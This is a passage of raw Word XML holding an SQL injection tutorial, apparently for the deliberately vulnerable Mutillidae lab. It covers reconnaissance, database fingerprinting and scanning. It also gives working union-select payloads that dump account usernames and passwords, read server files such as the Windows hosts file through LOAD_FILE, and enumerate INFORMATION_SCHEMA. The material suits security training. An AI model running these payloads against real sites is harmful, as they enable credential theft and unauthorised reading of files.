          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">) AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username,null,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> from INFORMATION_SCHEMA.COLUMNS--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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extract data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Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php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Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="105" w:after="270"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read files from server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Technique: Direct Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Page: user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>info.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Field: username</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Value (relative path):</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null, LOAD_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FILE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'../README') AS username, null, null--</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Value (absolute path):</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>' union select null, LOAD_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FILE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null, LOAD_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FILE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'..\\..\\..\\..\\WINDOWS\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>inf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>\\cpu.inf') AS username, null, null--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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upload files to server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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execute commands. This is easier on SQL Server 2000 and 2005. MySQL has limited system command abilities. SQL Server 2008 disables system commands by default and requires them to be enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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determine database computer name, IP address, username, version, etc.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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>MySQL Functions:</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>VERSION() - MySQL server version</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>USER() - Database user issuing query</w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="770000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>DATABASE() - Database on server against which query is running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003876C4" w:rsidRPr="003876C4" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="105" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Attempt to pivot to database server level. This will largely depend on either being able to execute system commands via the database server or upload files to the file system. Uploading files would allow web application pages to be uploaded which can contain system calls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003829FA" w:rsidRDefault="003876C4" w:rsidP="003876C4">
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="threeDEngrave" w:sz="6" w:space="2" w:color="000000" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>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 xml:space="preserve">Error messages can be excellent sources of information. Developers are often naive about error messages and allow their apps to display errors rather than log the errors privately or email them to support staff. Secure sites use custom error pages that display no error messages. Finding an error message with respect to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> typically involves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>malforming</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> the query on purpose. Special characters can get the job done. Single-quotes and parenthesis often cause errors in SQL Server, Oracle and MySQL databases. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>Dont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> forget to use different encodings of each character to see if that makes a difference. For example, try URL encoding, hex, etc. Try those first, then move onto any character that is not alpha-numeric.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hint: Go to the documentation for ANSI-SQL, Oracle, SQL Server, and MySQL to see which characters are reserved in those respective systems. (ANSI-SQL is the "common" SQL shared by all compliant databases.) In particular, determine what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>are the comment symbols for the respective systems</w:t>
      </w:r>
      <w:proofErr w:type="gram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Try to find out what type of database is behind the application. Knowing if the database is Oracle, SQL Server, or MySQL can help a lot. Each has its own meta-tables, functions, system tables, system procedures, and vulnerabilities. If the database is SQL Server or MySQL, investigate the INFORMATION_SCHEMA and understand the built-in functions/procedures. They both implement this SQL-92 standard structure. Oracle uses non-standard "Oracle Data Dictionary" views. As of the date of this document, there is an awesome listing at </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003876C4">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://ss64.com/orad/</w:t>
        </w:r>
      </w:hyperlink>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 xml:space="preserve">Sometimes the type of database can be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>infered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> by its behavior. For example, SQL Server and MySQL both use "--" (double-hyphen) as the comment symbols; however, MySQL requires a space </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>betwwen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> the comment symbol and the next character.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This statement is a valid SQL injection against either SQL Server or MySQL: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select/**/name/**/FROM/**/INFORMATION_SCHEMA.TABLES--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MySQL can be identified by whether the injection requires a space on the end. Oracle and SQL Server do not care if there is a space at the end of the injection or not. But MySQL needs the space on the end. (At least when used with PHP.) </w:t>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> select name FROM INFORMATION_SCHEMA.TABLES-- (&lt;-- space required here)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 xml:space="preserve">Determine the page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>capibilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the page displays database records, standard SQL injection is probably the better tool. If the page processes queries but does not display query output (i.e. - a login page), then blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be the better tool.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 xml:space="preserve">Use the page normally and observe the behavior. For example, log into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve">. Does </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> display any information from the database because you log-in? (No) What happens when using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xml:space="preserve">? Does any data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t>displaywhen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> using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(Yes) The login page is likely going to be a better candidate for blind SQL injection while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xml:space="preserve"> is likely a better candidate for direct SQL injection.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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="threeDEngrave" w:sz="6" w:space="2" w:color="000000" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>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Get specifications on database software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null, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gram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current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003876C4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(), version() --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If the meta-tables are available, they can footprint the database structure making the next steps much more productive.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Check the documentation for Oracle, MySQL, and SQL Server. Determine the meta-table structures, table/view names, and column names. If the database is SQL Server or MySQL, investigate the INFORMATION_SCHEMA and understand the built-in functions/procedures. They both implement this SQL-92 standard structure. Oracle uses non-standard "Oracle Data Dictionary" views. As of the date of this document, there is an awesome listing at </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003876C4">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://ss64.com/orad/</w:t>
        </w:r>
